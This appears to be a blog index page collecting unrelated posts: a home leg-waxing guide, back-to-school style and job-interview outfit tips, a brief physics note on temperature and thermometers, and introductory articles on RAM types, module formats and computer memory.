    Data are read or written into memory based on a clock. Standard DRAM memories use a method known as SDR (Single Data Rate) involving reading or writing a piece of data at each leading edge.
    The DDR doubles the frequency of reading/writing, with a clock at the same frequency, by sending data to each leading edge and to each trailing edge.

    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    How to Wax Your Legs

    Nowadays there are plenty of hair removal methods available for women in order to get rid of unwanted hair on their body. You have probably tried to shave your legs but you ended up with nasty ingrown hairs and coarse hair. Although it is one of the most common methods of hair removal, the result lasts only for a few days and you can even cut yourself easily. Contrarily, waxing is a wonderful option to have smooth and soft legs for a long time. Once you try it, you won’t ever return to the razor. Today we will give you a useful step-by-step guide on how to wax your legs right at home.
     Waxing you legs is a simple and practical hair removal alternative to achieve fabulous skin. Although it is a little bit painful, waxing is one of the most popular and most efficient ways to get rid of unwanted hair on your legs. As opposed to shaving or depilatory creams, waxing gives long term results, the hair being removed at the root.

    If you regularly wax your legs, the hair will become finer, and you won’t have to deal with tapered ends and ingrown hairs any more. Waxing can be tricky for many of us, but if you do it correctly, you can save a lot of money and achieve wonderful, smooth and sexy legs right at home. Following our tips, you can learn how to wax your legs like a pro.
     First of all let the hair grow out on your legs and make sure it’s long enough to wax. The minimal length that wax can stick to is 1/4 inch. Purchase a quality roll-on waxing kit that contains waxing strips, which can be bought separately as well. Roll-on systems are hygienic, leave no mess behind and can be used easily and safely at home.


  • Two days before you plan to wax your legs, exfoliate them with a mild body scrub in order to get rid of dead skin cells. It is important to do this one or two days before the actual wax depilation to avoid eventual skin irritations.



  • Right before you start waxing, dust a little baby powder on your legs. This is a great trick, since the powder absorbs the oil from the skin’s surface and the wax can stick more easily to the hair.



  • Heat the wax in the wax warmer or a container of water heated to boiling point. Follow the instructions written on the package, mainly those referring to heating in order to avoid overheating the wax and burning yourself. Proceed according to the instructions of the producer.


  • Sit down comfortably on a surface that can be easily cleaned. Using the roll-on applicator, apply the wax carefully in a thin, uniform layer. For the best results, hold the roll-on wax applicator at a 90-degree angle. One of the most important things you should always pay attention to is to apply the wax in the direction of hair growth. This way you can cover all the hairs evenly, so you can have wonderful, smooth legs.



  • Before the wax cools down, press a strip over the wax on your feet, applying pressure and smoothing all over so the hairs can stick better into the wax. Pull the skin taught using one hand and remove the strip with the other hand, pulling the strip in the opposite direction of the hair growth. While removing the strip, make sure you keep it as close to the skin as possible, so that it will be less painful. Proceed similarly until you finish both of your legs.



  • If the waxed area stings a little bit, you can apply a slightly damp cloth over your leg to calm it instantly. After waxing apply an antiseptic product containing salicylic acid to disinfect the area, avoid irritations and to prevent ingrown hairs as well.



  • To remove all the residues of wax from the surface of your skin, soak a cotton pad into a small amount of body oil and apply it on your legs.



  • Purchasing a proper roll-on waxing kit will help you to remove unwanted hair from your legs easily and safely right at home. This costless method can give your professional results and you can enjoy your fabulous, smooth legs for a long time.

    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Look Your Best For School

    Going back to school and looking great is a very important thing. everyone wishes to make a good impression by looking their best. Find out how you can upgrade your fashion style.
     Going back to school and looking your best for your first day is very important especially if you want to make a good first impression. It is always exciting to meet new people or to see old colleagues which you haven't seen for a while.
    Everyone wishes to look changed, different and better to receive complements which will automatically boost up their confidence. If you make the right choices you will definitely stand out and be the center of attention.

    The best way to upgrade your style is by changing your wardrobe, or, if you can't afford it try to be more inventive with what you have. Look through your clothes and try to mix and match. Wear clothes that fit you well and match your own style. There is no point in wearing the latest and the trendiest outfits if they don't look good on you. You can definitely be stylish by dressing with good taste even if the clothes aren't in the latest fashion trends.

    Find out your style!
    It is very important to find out your own style and to try to improve it with time. If you know how to wear clothing and you feel good wearing what you like you will exude confidence. Some clothes are designed to accentuate certain types of bodies and don't offer any advantages for other types. This is why it is important to be objective about buying clothing. If it doesn't do you justice don't buy it even if you like it. You might like it but if you put it on and it doesn't look good, you didn't really make a good deal.

    Accessorize !!!Accessorize!! Accessorize!
    Accessories are very important when it comes to an outfit. They can take an outfit from boring to fabulous in a matter of minutes. You don't have to exaggerate, all you need to do is wear an oversized necklace or a bangle and a cute handbag, and you can transform your outfit completely. Even a simple scarf can help upgrade your outfit. Accessories are very hot this year so check out the latest trends when it comes to accessories.

    Keep up with the fashion trends!
    There are so many tips and trick you can learn just by keeping track of the latest fashion trends. There are a variety of fashion designers who get their inspiration from different sources, creating different styles, to match everyone's taste. Find a fashion designer you can appeal to and inspire your outfits from his fashion collection. It really doesn't matter that you are not wearing the exact same outfit, you can inspire yourself to buy affordable clothes which have similar cuts, designs even colors.

     Pay attention to your hair and make-up!
    Hair is very important when it comes to looks and there are a variety of hairstyles to choose from. Choose a hairstyle which suites your face shape and your hair type. Go for loose hairstyles or pulled up hairstyles. As far as make-up goes simple is better. You can go for black eyeliner and sheer lip gloss. This is one of the latest make-up trends of this fall season so you will be in style when it comes to make-up as well.

    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    How To Dress On Your Interview

    t is said that first impression counts the most. When looking for your dream job it is crucial not to neglect all the important details regarding the job interview. Among these essential items you have to consider, your outfit plays a major role as it can highly influence the final decision. It takes a few seconds for someone to make a first impression of you, based on your body language, demeanor, but also the way you are dressed. Therefore, if you still don't know how to dress for a job interview, take a look to these basic tips.


    Creating a good first impression is important regardless your career level. Since sometimes this opinion cannot be reversed, you should be extremely attentive when choosing the right outfit for the job interview. A clean and tidy physical appearance is a must as this not only says a lot of things about you, but it also boosts self-confidence. Here's a basic guide on how to properly dress for a job interview. However, remember to stay professional without losing your personal style and adapt the outfit based on the domain of the job. The idea is not to disguise and wear a mask, but stay decent and be yourself.

    As a job interview can be a real stressful moment, make sure you choose the outfit in time. The way you dress for the job interview is highly related to the nature of the job. For example, if the job is in domains such as finance or law, the outfit should be rather classic and severe.

    Suits in a sober, plain color, white shirts, fine jewelry and a pair of simple, not too tall pumps works great. If you are looking for a job in a social environment, medical or something that has to do with kids, your should bet on the comfortable and practical side, choosing natural, comfy fabrics and pastels. A job in commerce also requires a suit.

      If the interview is for a job in domains such as communication or advertising, you are allowed to wear something a little bit more original. The same thing can be applied when it comes to artistic jobs where the classic suit can easily be replaced. However, don't go to extremes and take full advantage of your creativity as it might disadvantage you. Good sense and originality should blend in this case in a harmonious way. Is up to you to put your balancing skills to the test. You can add a creative touch using unique accessories and shoes.

    A jean is not a too bad idea as long as you match it properly, especially for a job in advertising. The outfit should be in accordance with the domain you want to work, but whether you need to adopt a more conservative look or a creative one, you have to look just like a real professional.

    Two basic things for you to take into consideration are the cut and the colors of your clothes. Avoid provocative and too sexy outfits, such as a daring mini skirt, tight-fitting blazers or pants, or a deep decollete. Knee length dresses or skirts, but also pants and shirts represent some of the safest choices. As for the colors, stick to neutrals, such as black, white, gray, blue, or pastels. A black and white outfit will always look very elegant with a sophisticated touch. You can create a beautiful outfit by matching a high-waisted black skirt, a white shirt, a belt and black pumps. For those of you who are not so much into skirts, you can replace them with a pair of elegant black pants.
    As we have said before, your outfit also has to be a reflection of your personality. What better way to do this than by choosing accessories that show your personal style? Moreover, they are the best way to sweeten a too severe outfit, adding elegance and originality to your overall look. However, remember not to exaggerate with your creativity and try to stay away from oversize jewelry and too bright and daring colors. The only indispensable accessory is the watch.

    Another detail that shouldn't be omitted are the shoes. Try to avoid extreme high heels as they can be rather uncomfortable. Besides, shoes that have a special, unique and more crazy design are a total no-no. The best way to impress is to keep it as simple as possible and go for something classic, such as a pair of black shoes. As for the handbag, this should be large enough for you to put your resume, a bloc notes and a bottle of water. Choose a handbag in a light, soft color.
    After the outfit has been chosen, it's time we pass to makeup and hairstyle that need to be made following the same rules of simplicity and naturalness. You can choose a nude makeup and obtain a flawless looking skin, yet very professional. You can apply a soft coat of lip gloss or lipstick keeping everything rather natural without falling into the sexy category. Avoid too elaborated and studied hairstyles and keep everything as natural as possible going for a classic chignon. Clean and tidy should be the two words describing makeup and hairstyle for a job interview. This rule is valid for perfume too as we don't want to asphyxiate the employer. Also, pay attention to your nails.

    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    PHYSICS--HEAT

    Temperature
    temperature is degree of coldness or hotness of a body which expressed in term of number on chosen scale which may be fahrenheit or celcius scale
    Thermometer
    Thermometer is an instrument which used to measure the degree of hotness or coldness of a body
    -thermometer use some measurable property of a substance called thermometric properties
     The thermometric properties are
     -thermometric property are property which varies linearly and continuously with temperature also called physical property of thermometer


    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    All About Random access memory(RAM) Part 1



    Types of random access memory

    There are generally two broad categories of random access memory:
    • DRAM memories (Dynamic Random Access Module), which are inexpensive. They are used essentially for the computer's main memory
    • SRAM memories (Static Random Access Module), which are fast and costly. SRAM memories are used in particular for the processor's cache memory


    Operation of the random access memory

    The random access memory comprises hundreds of thousands of small capacitors that store loads. When loaded, the logical state of the capacitor is equal to 1, otherwise it is 0, meaning that each capacitor represents one memory bit.
    Given that the capacitors become discharged they must be constantly recharged (the exact term is refresh) at regular intervals, known as the refresh cycle. DRAM memories for example require refresh cycles of around 15 nanoseconds (ns).
    Each capacitor is coupled with a transistor (MOS-type) enabling "recovery" or amendment of the status of the capacitor. These transistors are arranged in the form of a table (matrix) thus we access a memory box (also called memory point) via a line and a column.


    Each memory point is thus characterised by an address which corresponds to a row number and a column number. This access is not instant and the access time period is known as latency time. Consequently, time required for access to data in the memory is equal to cycle time plus latency time.

    Thus, for a DRAM memory, access time is 60 nanoseconds (35ns cycle time and 25ns latency time). On a computer, the cycle time corresponds to the opposite of the clock frequency; for example, for a computer with frequency of 200 MHz, cycle time is 5 ns (1/200*106)).

    Consequently a computer with high frequency using memories with access time much longer than the processor cycle time must perform wait states to access the memory. For a computer with frequency of 200 MHz using DRAM memories (and access time of 60ns), there are 11 wait states for a transfer cycle. The computer's performance decreases as the number of wait states increases, therefore we recommend the use of faster memories.

    RAM module formats

    There are many type of random access memory. They exist in the form of memory modules that can be plugged into the mother board.
    Early memories existed in the form of chips called DIP (Dual Inline Package). Nowadays, memories generally exist in the form of modules, which are cards that can be plugged into connectors for this purpose. There are generally three types of RAM module:
    • modules in SIMM format (Single Inline Memory Module): these are printed circuit boards with one side equipped with memory chips. There are two types of SIMM modules, according to the number of connectors:
      • SIMM modules with 30 connectors (dimensions are 89x13mm) are 8-bit memories with which first-generation PCs were equipped (286, 386). 

      • SIMM modules with 72 connectors (dimensions are 108x25mm) are memories able to store 32 bits of data simultaneously. These memories are found on PCs from the 386DX to the first Pentiums. On the latter, the processor works with a 64-bit data bus; this is why these computers must be equipped with two SIMM modules. 30-pin modules cannot be installed on 72-connector positions because a notch (at the centre of the connectors) would prevent it from being plugged in.  



      • modules in DIMM format (Dual Inline Memory Module) are 64-bit memories, which explains why they do not need pairing. DIMM modules have memory chips on both sides of the printed circuit board and also have 84 connectors on each side, giving them a total of 168 pins. In addition to having larger dimensions than SIMM modules (130x25mm), these modules have a second notch to avoid confusion.


     It may be interesting to note that the DIMM connectors have been enhanced to make insertion easier, thanks to levers located either side of the connector.
    Smaller modules also exist; they are known as SO DIMM (Small Outline DIMM), designed for portable computers. SO DIMM modules have only 144 pins for 64-bit memories and 77 pins for 32-bit memories.
    • modules in RIMM format (Rambus Inline Memory Module, also called RD-RAM or DRD-RAM) are 64-bit memories developed by Rambus. They have 184 pins. These modules have two locating notches to avoid risk of confusion with the previous modules.


    Given their high transfer speed, RIMM modules have a thermal film which is supposed to improve heat transfer.
    As for DIMMs, smaller modules also exist; they are known as SO RIMM (Small Outline RIMM), designed for portable computers. SO RIMM modules have only 160 pins.


    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    Introduction to Memory

    The Role of Memory

    The term "memory" applies to any electronic component capable of temporarily storing data. There are two main categories of memories:
    • internal memory that temporarily memorises data while programs are running. Internal memory uses microconductors, i.e. fast specialised electronic circuits. Internal memory corresponds to what we call random access memory (RAM).
    • auxiliary memory (also called physical memory or external memory) that stores information over the long term, including after the computer is turned off. Auxiliary memory corresponds to magnetic storage devices such as the hard drive, optical storage devices such as CD-ROMs and DVD-ROMs, as well as read-only memories.


    Technical Characteristics

    The main characteristics of a memory are:
    • Capacity, representing the global volume of information (in bits) that the memory can store
    • Access time, corresponding to the time interval between the read/write request and the availability of the data
    • Cycle time, representing the minimum time interval between two successive accesses
    • Throughput, which defines the volume of information exchanged per unit of time, expressed in bits per second
    • Non-volatility, which characterises the ability of a memory to store data when it is not being supplied with electricity



    The ideal memory has a large capacity with restricted access time and cycle time, a high throughput and is non-volatile.
    However, fast memories are also the most expensive. This is why memories that use different technologies are used in a computer, interfaced with each other and organised hierarchically.

    Types of Memories


    Random Access Memory

    Random access memory, generally called RAM is the system's main memory, i.e. it is a space that allows you to temporarily store data when a program is running.
    Unlike data storage on an auxiliary memory such as a hard drive, RAM is volatile, meaning that it only stores data as long as it supplied with electricity. Thus, each time the computer is turned off, all the data in the memory are irremediably erased.

    Read-Only Memory

    Read-only memory, called ROM, is a type of memory that allows you to keep the information contained on it even when the memory is no longer receiving electricity. Basically, this type of memory only has read-only access. However, it is possible to save information in some types of ROM memory.

    Flash Memory

    Flash memory is a compromise between RAM-type memories and ROM memories. Flash memory possesses the non-volatility of ROM memories while providing both read and write access However, the access times of flash memories are longer than the access times of RAM.

    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS